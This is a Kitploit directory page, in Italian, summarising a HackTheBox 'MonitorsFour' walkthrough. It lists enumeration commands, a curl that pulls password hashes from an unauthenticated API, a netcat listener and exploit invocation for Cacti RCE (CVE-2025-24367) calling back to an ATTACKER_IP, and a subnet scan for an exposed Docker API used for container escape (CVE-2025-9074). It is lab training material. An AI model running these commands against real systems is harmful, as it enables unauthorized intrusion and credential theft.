Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
monitorsfour — HackTheBox MonitorsFour walkthrough che copre la fuga di credenziali, CVE-2025-24367 Cacti RCE e CVE-2025-9074 Docker Desktop API container escape per ottenere root. | Kitploit
Strumenti/GitHubGitHub/ledksv/monitorsfour
Password CrackingRicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitCTFPenetration TestingApprendimento e FormazioneEscape dal Container
GitHubledksv/monitorsfour

monitorsfour

3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

HackTheBox MonitorsFour walkthrough che copre la fuga di credenziali, CVE-2025-24367 Cacti RCE e CVE-2025-9074 Docker Desktop API container escape per ottenere root.

Vedi Repository

MonitorsFour — HackTheBox

Piattaforma: HackTheBox OS: Windows Stato: Ritirata — walkthrough completa pubblicata.

Walkthrough completa: l3dsec.com/walkthroughs/monitorsfour-htb


Catena di attacco

root@kitploit:~
Nmap → nginx (80) + WinRM (5985)
  → ffuf → cacti.monitorsfour.htb (Cacti)
    → endpoint API non autenticato → credenziali
      → CVE-2025-24367 Cacti RCE → shell come www-data (Docker)
        → CVE-2025-9074 Docker Desktop API (192.168.65.x:2375)
          → mount del filesystem host → root flag

1. Enumerazione

root@kitploit:~
nmap -sV -sC <TARGET_IP>
nmap -sV -sC <TARGET_IP> -p-
root@kitploit:~
PORT     STATE SERVICE       VERSION
80/tcp   open  http          nginx
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (WinRM)

Il fuzzing dei virtual host ha rivelato cacti.monitorsfour.htb — un'istanza di monitoraggio di rete Cacti.


2. Scoperta delle credenziali

Un endpoint API non autenticato sul dominio principale espone i dati degli account utente, inclusi gli hash delle password MD5:

root@kitploit:~
curl -s "http://monitorsfour.htb/user?token=0"

L'hash MD5 è stato craccato immediatamente — fornisce credenziali valide per Cacti.


3. Foothold iniziale — CVE-2025-24367 (Cacti Authenticated RCE)

Istanza Cacti vulnerabile a RCE autenticata tramite la funzionalità Graph Template:

root@kitploit:~
nc -lvnp 9001

sudo python3 exploit.py \
  -url http://cacti.monitorsfour.htb \
  -u marcus \
  -p <password> \
  -i <ATTACKER_IP> \
  -l 9001

Shell come www-data all'interno di un container Docker. User flag in /home/marcus/user.txt.


4. Container Escape — CVE-2025-9074 (Docker Desktop API)

Il socket Docker non è montato. Docker Desktop espone la sua Engine API senza autenticazione sulla sottorete interna 192.168.65.0/24:

root@kitploit:~
# Scan for open Docker API
for i in $(seq 1 254); do
  (curl -s --connect-timeout 1 http://192.168.65.$i:2375/version 2>/dev/null \
    | grep -q "ApiVersion" && echo "192.168.65.$i:2375 OPEN") &
done; wait

È stato creato un container tramite l'API che monta il drive C:\ dell'host, quindi è stata letta la root flag da C:\Users\Administrator\Desktop\root.txt.


Flag

FlagValore
Userredacted
Rootredacted

Solo a scopo educativo. Testa esclusivamente sistemi di tua proprietà o per i quali hai esplicita autorizzazione scritta.

Scarica lo strumento